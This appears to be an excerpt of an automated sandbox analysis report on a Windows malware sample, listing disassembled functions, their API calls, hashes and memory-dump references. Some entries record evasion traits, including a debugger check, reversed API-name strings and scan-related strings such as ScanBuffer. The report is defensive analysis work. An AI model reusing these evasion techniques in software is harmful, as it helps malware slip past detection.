                                                                                                                                                                                                                                                                                                                                                      • API ID: Read$HandleModule
                                                                                                                                                                                                                                                                                                                                                      • String ID: KernelBase$LoadLibraryExA
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 2226866862-113032527
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: eb905b252b1babc66ecff22e09fcb2bbc91557c7c176448a924e5b0af9dd5216
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: ea3dd600d6306d7bcd130fbae488f59da6896acad3e8990c73df835744318a98
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: eb905b252b1babc66ecff22e09fcb2bbc91557c7c176448a924e5b0af9dd5216
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 91317071A44305BBEB60DB69CCC5F6977A8AF06358F104511EA24EB3E1D370ED00DB64
                                                                                                                                                                                                                                                                                                                                                      Function 02CF435C Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 38filewindowCOMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02CF4423,?,?,02D767C8,?,?,02D1E7A8,02CF65B1,02D1D30D), ref: 02CF4395
                                                                                                                                                                                                                                                                                                                                                      • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02CF4423,?,?,02D767C8,?,?,02D1E7A8,02CF65B1,02D1D30D), ref: 02CF439B
                                                                                                                                                                                                                                                                                                                                                      • GetStdHandle.KERNEL32(000000F5,02CF43E4,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02CF4423,?,?,02D767C8), ref: 02CF43B0
                                                                                                                                                                                                                                                                                                                                                      • WriteFile.KERNEL32(00000000,000000F5,02CF43E4,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02CF4423,?,?), ref: 02CF43B6
                                                                                                                                                                                                                                                                                                                                                      • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 02CF43D4
                                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1462328557.0000000002CF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462273751.0000000002CF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462595036.0000000002D1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002D77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2cf0000_C6dAUcOA6M.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: FileHandleWrite$Message
                                                                                                                                                                                                                                                                                                                                                      • String ID: Error$Runtime error at 00000000
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 1570097196-2970929446
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 7d3f3ff4b70d131347bb936bd6aea8d230ac2779088dcd1993cb736cf87aa468
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: ae54f8598b1e4db582898272b267b5caa824879ae4d0a73e27befadee5f8657e
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7d3f3ff4b70d131347bb936bd6aea8d230ac2779088dcd1993cb736cf87aa468
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 70F02B61AC4300B4F6E5A2607C05F5A236C0B44F11F548604B718942C0D7E888DC9711
                                                                                                                                                                                                                                                                                                                                                      Function 02CFAEC4 Relevance: 10.6, APIs: 7, Instructions: 56filewindowCOMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 02CFAD3C: VirtualQuery.KERNEL32(?,?,0000001C), ref: 02CFAD59
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 02CFAD3C: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 02CFAD7D
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 02CFAD3C: GetModuleFileNameA.KERNEL32(02CF0000,?,00000105), ref: 02CFAD98
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 02CFAD3C: LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 02CFAE2E
                                                                                                                                                                                                                                                                                                                                                      • CharToOemA.USER32(?,?), ref: 02CFAEFB
                                                                                                                                                                                                                                                                                                                                                      • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?), ref: 02CFAF18
                                                                                                                                                                                                                                                                                                                                                      • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,?,?), ref: 02CFAF1E
                                                                                                                                                                                                                                                                                                                                                      • GetStdHandle.KERNEL32(000000F4,02CFAF88,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 02CFAF33
                                                                                                                                                                                                                                                                                                                                                      • WriteFile.KERNEL32(00000000,000000F4,02CFAF88,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 02CFAF39
                                                                                                                                                                                                                                                                                                                                                      • LoadStringA.USER32(00000000,0000FFEA,?,00000040), ref: 02CFAF5B
                                                                                                                                                                                                                                                                                                                                                      • MessageBoxA.USER32(00000000,?,?,00002010), ref: 02CFAF71
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1462328557.0000000002CF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462273751.0000000002CF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462595036.0000000002D1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002D77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2cf0000_C6dAUcOA6M.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: File$HandleLoadModuleNameStringWrite$CharMessageQueryVirtual
                                                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 185507032-0
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: e7a0c7ed252b85f5192d37a9f36373199c8b68299ab80e1f2e936d2612eb0368
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 0c94d3c835c86253c0cb50b061377debafa15537aa5b492b8c6a32fbcbb8ad61
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e7a0c7ed252b85f5192d37a9f36373199c8b68299ab80e1f2e936d2612eb0368
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 58115EB2544200BED2C0FBA4CC85F8BB7BDAB44740F500916B754DA1E0EA75E9449B62
                                                                                                                                                                                                                                                                                                                                                      Function 02CFE58C Relevance: 9.1, APIs: 6, Instructions: 139COMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 02CFE625
                                                                                                                                                                                                                                                                                                                                                      • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 02CFE641
                                                                                                                                                                                                                                                                                                                                                      • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 02CFE67A
                                                                                                                                                                                                                                                                                                                                                      • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 02CFE6F7
                                                                                                                                                                                                                                                                                                                                                      • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 02CFE710
                                                                                                                                                                                                                                                                                                                                                      • VariantCopy.OLEAUT32(?,00000000), ref: 02CFE745
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1462328557.0000000002CF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462273751.0000000002CF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462595036.0000000002D1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002D77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2cf0000_C6dAUcOA6M.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: ArraySafe$BoundIndex$CopyCreateVariant
                                                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 351091851-0
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: a9a696700a5c398af6b49de9a61da99d4f96f00f59c5a2cf8b5ab96da2f16d4b
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: a26ca870661523740cea53ede5a383b4706f2f284fe88399a2cfd607609bfeaa
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a9a696700a5c398af6b49de9a61da99d4f96f00f59c5a2cf8b5ab96da2f16d4b
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8D51FA7590162D9FCBA2DF58CC80BD9B3BEAF49300F0041D5E609E7221DA30AF859FA5
                                                                                                                                                                                                                                                                                                                                                      Function 02CF3598 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49registryCOMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02CF35BA
                                                                                                                                                                                                                                                                                                                                                      • RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,02CF3609,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02CF35ED
                                                                                                                                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,02CF3610,00000000,?,00000004,00000000,02CF3609,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02CF3603
                                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1462328557.0000000002CF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462273751.0000000002CF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462595036.0000000002D1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002D77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2cf0000_C6dAUcOA6M.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: CloseOpenQueryValue
                                                                                                                                                                                                                                                                                                                                                      • String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 3677997916-4173385793
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 8f245627344ac1a6ed6254d9a874b9f051e8698ef8cca41653af31c3cfab9a55
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: b14d9d27039e3b65fdae1f434fe0febdd417514a34f1f22dac20db4bb89cdb1f
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8f245627344ac1a6ed6254d9a874b9f051e8698ef8cca41653af31c3cfab9a55
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AA01B575940298BAFB91DBD0CD02BB977FCE708B00F2105A2FF04D7680E6B4AA10DA59
                                                                                                                                                                                                                                                                                                                                                      Function 02D08274 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 44libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02D082FC,?,?,00000000,00000000,?,02D08215,00000000,KernelBASE,00000000,00000000,02D0823C), ref: 02D082C1
                                                                                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02D082C7
                                                                                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,?), ref: 02D082D9
                                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1462328557.0000000002CF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462273751.0000000002CF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462595036.0000000002D1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002D77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2cf0000_C6dAUcOA6M.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: AddressProc$HandleModule
                                                                                                                                                                                                                                                                                                                                                      • String ID: Kernel32$sserddAcorPteG
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 667068680-1372893251
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 5ec6063a509297b70b40ccd93b880aebab179b36b389e4a1da7164f2463496b3
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 6c91c25947a281124ce231253344833b8991877aef0051d2b74128ff0c7421c5
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5ec6063a509297b70b40ccd93b880aebab179b36b389e4a1da7164f2463496b3
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0A016774740304AFFB94EBA4EC81F9EB7AEEB49B00F514860BA50D7750E674AD04DA24
                                                                                                                                                                                                                                                                                                                                                      Function 02CFAA50 Relevance: 7.6, APIs: 5, Instructions: 50threadCOMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • GetThreadLocale.KERNEL32(?,00000000,02CFAAE7,?,?,00000000), ref: 02CFAA68
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 02CFA7C4: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02CFA7E2
                                                                                                                                                                                                                                                                                                                                                      • GetThreadLocale.KERNEL32(00000000,00000004,00000000,02CFAAE7,?,?,00000000), ref: 02CFAA98
                                                                                                                                                                                                                                                                                                                                                      • EnumCalendarInfoA.KERNEL32(Function_0000A99C,00000000,00000000,00000004), ref: 02CFAAA3
                                                                                                                                                                                                                                                                                                                                                      • GetThreadLocale.KERNEL32(00000000,00000003,00000000,02CFAAE7,?,?,00000000), ref: 02CFAAC1
                                                                                                                                                                                                                                                                                                                                                      • EnumCalendarInfoA.KERNEL32(Function_0000A9D8,00000000,00000000,00000003), ref: 02CFAACC
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1462328557.0000000002CF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462273751.0000000002CF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462595036.0000000002D1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002D77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2cf0000_C6dAUcOA6M.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: Locale$InfoThread$CalendarEnum
                                                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 4102113445-0
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 08d7bce2e8efb2cf06de1577f8ea311b72a99fbdbf9276935f4b19cf28057f66
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: c6cb6ae124892539e3e1a3131f30d45c506976cb563b5e63b5ed1bbd28360257
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 08d7bce2e8efb2cf06de1577f8ea311b72a99fbdbf9276935f4b19cf28057f66
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5B01F2B02803447FF6D2EA74CD11B6BB76DDB86710F610170E714A66C0E6759E00AA68
                                                                                                                                                                                                                                                                                                                                                      Function 02CFAB00 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 148threadCOMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • GetThreadLocale.KERNEL32(?,00000000,02CFACD0,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 02CFAB2F
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 02CFA7C4: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02CFA7E2
                                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1462328557.0000000002CF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462273751.0000000002CF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462595036.0000000002D1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002D77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2cf0000_C6dAUcOA6M.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: Locale$InfoThread
                                                                                                                                                                                                                                                                                                                                                      • String ID: eeee$ggg$yyyy
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 4232894706-1253427255
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 8483155ec71475b6b194009218a7f12fee342844adbb26acac043c2c68bafb70
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 43bf6467cd726e09c4945d254d550249039cc113a73ffddd612b224cb218f2da
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8483155ec71475b6b194009218a7f12fee342844adbb26acac043c2c68bafb70
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F841E1B17049044BDBE9EB7988906BFF3EBDB86200B504522D75AC3354EA26DE01EA65
                                                                                                                                                                                                                                                                                                                                                      Function 02D081CC Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 36COMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02D0823C,?,?,00000000,?,02D07A7E,ntdll,00000000,00000000,02D07AC3,?,?,00000000), ref: 02D0820A
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 02D08274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02D082FC,?,?,00000000,00000000,?,02D08215,00000000,KernelBASE,00000000,00000000,02D0823C), ref: 02D082C1
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 02D08274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02D082C7
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 02D08274: GetProcAddress.KERNEL32(?,?), ref: 02D082D9
                                                                                                                                                                                                                                                                                                                                                      • GetModuleHandleA.KERNELBASE(?), ref: 02D0821E
                                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1462328557.0000000002CF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462273751.0000000002CF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462595036.0000000002D1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002D77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2cf0000_C6dAUcOA6M.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: HandleModule$AddressProc
                                                                                                                                                                                                                                                                                                                                                      • String ID: AeldnaHeludoMteG$KernelBASE
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 1883125708-1952140341
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: e828f9928802cf491d30d5eeae5100ecaf51f33695833eaf5c877393e400496c
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 0640b9ff4c8fa73f037d7641c643a08497c7c38b982894daa4f9b902de381d2e
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e828f9928802cf491d30d5eeae5100ecaf51f33695833eaf5c877393e400496c
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8AF09670A44704AFF754FFB4EC81A5AB7EEE74E700B518860F910D7760E634AE14AA64
                                                                                                                                                                                                                                                                                                                                                      Function 02D0F6E8 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(KernelBase,?,02D0FAEB,UacInitialize,02D77380,02D1B7B8,OpenSession,02D77380,02D1B7B8,ScanBuffer,02D77380,02D1B7B8,ScanString,02D77380,02D1B7B8,Initialize), ref: 02D0F6EE
                                                                                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,IsDebuggerPresent), ref: 02D0F700
                                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1462328557.0000000002CF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462273751.0000000002CF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462595036.0000000002D1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002D77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2cf0000_C6dAUcOA6M.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: AddressHandleModuleProc
                                                                                                                                                                                                                                                                                                                                                      • String ID: IsDebuggerPresent$KernelBase
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 1646373207-2367923768
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: d74c6094f8356e214314601eaf1ff6cd70c9a41698f7f19a350fad1f38b5f261
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: a8ec699d20edafa7273116ceed5b23290b7382a99a35203e26f07ebe896169d1
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d74c6094f8356e214314601eaf1ff6cd70c9a41698f7f19a350fad1f38b5f261
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CFD012A13503501DBE5073F82CC4A19038C999452D3300E20B233C76E2E9B6AC19A116
                                                                                                                                                                                                                                                                                                                                                      Function 02CFC474 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 16libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • GetModuleHandleA.KERNEL32(kernel32.dll,?,02D1D10B,00000000,02D1D11E), ref: 02CFC47A
